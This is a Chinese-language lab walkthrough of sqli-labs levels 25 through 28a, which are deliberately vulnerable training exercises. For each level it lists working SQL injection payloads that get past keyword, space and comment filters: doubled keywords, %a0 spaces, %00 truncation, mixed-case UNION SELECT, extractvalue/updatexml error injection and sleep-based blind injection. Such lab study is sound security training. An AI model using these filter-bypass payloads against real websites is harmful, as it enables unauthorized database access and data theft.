sqli-labs靶场详解(less25/25a-less28/28a)

在SQL注入过程中难点就是判断注入点 只要注入点确定了 获取数据库数据的过程就是复制

从这关开始 只进行判断注入点了和代码逻辑分析了 因为注入操作太简单了(不演示了)


目录

less-25

less-25a

less-26

less-26a

less-27

less-27a

less-28

less-28a


less-25

首先正常页面 说是or和and属于他们 过滤一个id参数的值 搞不懂 先正常来

判断注入点

?id=1 正常

?id=1' 错误:to use near ''1''

?id=1\ 错误:to use near ''1\'

正常来说是缺少单引号

?id=1'#

提示Your Input is Filtered with following result: 1'

?id=1'--+ 成功

?id=1' and '1'='1 无返回结果

提示 Your Input is Filtered with following result: 1' '1'='1

原来如此 一开始就提示了 and和or 属于他们的 把and和 or过滤掉了

现在报错会被输出出来 但是无法使用and构造语句了


但是注释符没被过滤 使用联合查询试一下

?id=0' union select 1,2,3 --+ 成功

?id=0' union select 1,database(),3 --+ 成功

?id=0' union select 1,extractvalue(1,concat('~',database())),3 --+ 使用联合查询的报错函数也成功了


先看看双写可不可以

?id=1' aandnd 1=1 --+ 成功

?id=1' aandnd 1=2 --+ 成功


试试and的符号&&可不可以

发现&&一致报错 提示也没获取到&&符号以及后面的内容

但是or|| 一真则真

?id=2' || 1=1 --+ 成功

?id=2' || 1=2 --+ 成功

那么尝试报错注入

?id=0' || extractvalue(1,concat('~',database())) --+ 成功


代码分析

就是过滤了and和or 无需逻辑分析


less-25a

和上关提示一样 也是过滤了or和and

判断注入点

?id=1' 报错不告诉具体原因了 不能使用报错函数了

试试符号形式的and和or

?id=1 || 1=1 成功

?id=1 || 1=2 成功

看来是整型注入点

和上关一样&&一直报错只能使用||


看看双写可不可以

?id=2 aandnd 1=1 成功

?id=2 aandnd 1=2 失败

双写也可以


使用联合查询

?id=0 UNION SELECT 1,2,3 成功

?id=0 UNION SELECT 1,2,database() 成功


使用 延时函数

?id=1 anandd if(1,sleep(2),2) 成功

代码分析

无逻辑分析 就是参数为整型 过滤and和or 无报错函数


less-26

说是空格和comments都被过滤

判断注入点

?id=1 and 1=1

提示获取到了Your Input is Filtered with following result: 11=1

看来and和or还有空格都被过滤了 测试注释的时候发现注释也被过滤了

?id=1' 报错:to use near ''1'' 好消息这里能判断注这是字符型注入点

这么多东西都被过滤了 只能进行替换一个一个试了

看看双写

?id=1' anandd '1'='1 失败

但是提示显示获取到了and 证明双写可以 空格没有被获取到所以导致失败

找一个替换空格space的

space在url中是%20 可以 使用%a0 || %0b绕过

成功

因为是字符型注入

现在的操作是

?id=1'%a0anandd%a0'1'='1可以

但是注释符也被过滤了如果继续进行注入操作还是不行的

想办法把最后的单引号闭合

想到了两种方式

第一种方式就是再后面再加上一个and后者or

?id=1'%a0anandd%a0 1=1%a0anandd'1'='1 成功

第二种方式就是

%00会截断整个url

?id=1'%a0anandd%a0 1=1 ;%00 成功

解释一下正常我们输入的数据到url中都会进行编码

space的空格方式会被编码成%20

%20代表空格 %a0 也代表空格 在服务器只会过滤space方式的空格

%00属于空符截断。在某些编程语言和数据库实现中,它表示字符串的终止符

也就是说我们传入%00 服务器会把这个%00带入到数据库中 在数据库中的sql语句如果遇到了%00后面的语句就不执行了 也就相当于注释的意思 但是比注释更狠 因为注释不会注释服务器后端sql语句最后的分号 但是%00会把分号注释掉 所以要加上一个分号

在这里还要提一句

这关可以使用报错注入和联合注入 使用报错注入的时候 不用管空格因为有没有空格这个语句都会报错 在报错函数中可能会使用from之类的中间会有空格可以用括号括起来 像第二个例句一样

报错注入实例

?id=-1'||updatexml(1,concat(0x7e,database()),1)||'1'='1

?id=1'||extractvalue(1,concat('~',(select(group_concat(schema_name))from(information_schema.schemata))))||'1'='1

联合注入实例

?id=1'%a0union%a0select%a01,2,3;%00


代码分析

无需分析 就是加上了过滤条件 没有逻辑上的问题


less-26a

提示和上一关一样没什么区别

注入测试

?id=1' 报错 没给具体报错信息 不能使用报错函数

?id=1\ 反斜杠被过滤

?id=1 and 1=1 and和空格照样被过滤

?id=1%a0anandd%a01=1;%00 输出id=1的值

?id=1%a0anandd%a01=2;%00 输出id=1的值

;%00不报错可以证明该语句后面没有特殊字符

那为什么1=1和1=2输出结果一样呢

看源码

sql="SELECT \* FROM users WHERE id=('id') LIMIT 0,1";

$sql="SELECT * FROM users WHERE id=('1 and 1=2;

不应该呀 应该也报错呀

?id=1')%a0anandd%a01=1;%00

?id=1')%a0anandd%a01=2;%00

这两个语句成功执行了能使用盲注和联合查询 但是我还不明白为什么上面的能输出id=1的结果应该是报错呀

注意

1按理说空字符截断应该数据库报错 竟然没报错并且查询到了结果 有时候只能多尝试 把学过的都试一遍

2为什么字符串里面只要是第一个是1 2都能查询出结果 是因为 设置id为整型 强制转换后只保留第一位 后面输入啥都无所谓

代码分析

无逻辑分析内容 知识添加了过滤条件


less-27

正常界面 过滤了union和select

尝试

?id=1 and 1=1# 提示Your Input is Filtered with following result: 1and1=1

发现注释符和空格也被过滤 但是and没被过滤

?id=1'to use near ''1'' 有报错信息 估计是单引号没被闭合

?id=1'%a0and%a0'1'='1';%00成功执行

?id=1'%a0and%a0'1'='2';%00失败执行

确定为字符型注入点

看看双写 union 和select可不可以

发现union只过滤了一次 但是select过滤了两次

?id=0'%a0uunionnion%a0seseselectlectlect%a01,2,3;%00

试试大小写混合可不可以

?id=0'%a0UNIon%a0sELect%a01,2,3;%00 大小写也可以

这样就可以使用联合查询注入和报错注入

代码分析

增加了sleect和union的过滤


less-27a

和上题的提示一样

进行尝试

?id=1 and 1=1# 依旧是去除了空格注释

?id=1' 不报错并查询出结果 估计也是字符型的但是没用单引号

?id=1\ 报错信息不全 不能使用报错注入

多次测试发现是双引号闭合的字符型注入

?id=1"%a0and%a01=1;%00 成功

?id=1"%a0and%a01=2;%00 失败

上两句确定了注入点

构造语句 发现union和上一题一样过滤一次 select过滤两次 大小写也能成功绕过

?id=0"%a0ununionion%a0sELECT%a01,2,3;%00

试一试盲注(盲注是最慢的最不推荐)

?id=1"%a0and%a0if(1,sleep(2),2)%a0;%00 成功

代码分析

参数为双引号的字符型参数 不能使用报错函数


less-28

提示和27管一样过滤union和select

进行测试

?id=1 and 1=1# Your Input is Filtered with following result: 1and1=1

发现没有过滤and 和前几关一样过滤了注释和空格

?id=1' 报错:没有详细的报错信息 不能使用报错注入

?id=1';%00 报错 可能是整型 可能对参数使用的形式不止单引号

?id=1 and 1=1;%00成功

?id=1 and 1=2;%00成功

以上两个语句得出不是整型 那就是不止只有单引号

?id=1')%a0and%a01=1;%00 成功

?id=1')%a0and%a01=2;%00 失败

得出服务器参数的形式为('$id')

?id=0')%a0union%a0select%a01,2,3;%00 说是过滤union和select但是经过测试并没有被过滤

从而判断出这题能使用联合查询注入和盲注 不能使用报错注入

无需代码分析就是过滤条件比较多


less-28a

提示信息依旧是过滤union和select

注入测试

?id=1' 报错:无详细报错信息 不能使用报错注入

?id=1';%00 得出可能是整型可能字符型不止单引号

轻轻松松试出来

?id=1')%a0and%a01=1;%00 成功

?id=1')%a0and%a01=2;%00 不成功

的到注入点 构造语句

轻松拿下

?id=0')%a0union%a0select%a01,2,3;%00

id=1')%a0and%a0if(1,sleep(2),1);%00

可以使用联合查询 盲注

代码分析

依旧不需要逻辑分析

相关推荐
Mr.136 分钟前
数据库的三范式是什么?
数据库
Cachel wood12 分钟前
python round四舍五入和decimal库精确四舍五入
java·linux·前端·数据库·vue.js·python·前端框架
Python之栈19 分钟前
【无标题】
数据库·python·mysql
风_流沙31 分钟前
java 对ElasticSearch数据库操作封装工具类(对你是否适用嘞)
java·数据库·elasticsearch
亽仒凣凣39 分钟前
Windows安装Redis图文教程
数据库·windows·redis
亦世凡华、1 小时前
MySQL--》如何在MySQL中打造高效优化索引
数据库·经验分享·mysql·索引·性能分析
YashanDB1 小时前
【YashanDB知识库】Mybatis-Plus调用YashanDB怎么设置分页
数据库·yashandb·崖山数据库
ProtonBase1 小时前
如何从 0 到 1 ,打造全新一代分布式数据架构
java·网络·数据库·数据仓库·分布式·云原生·架构
云和数据.ChenGuang6 小时前
Django 应用安装脚本 – 如何将应用添加到 INSTALLED_APPS 设置中 原创
数据库·django·sqlite
woshilys7 小时前
sql server 查询对象的修改时间
运维·数据库·sqlserver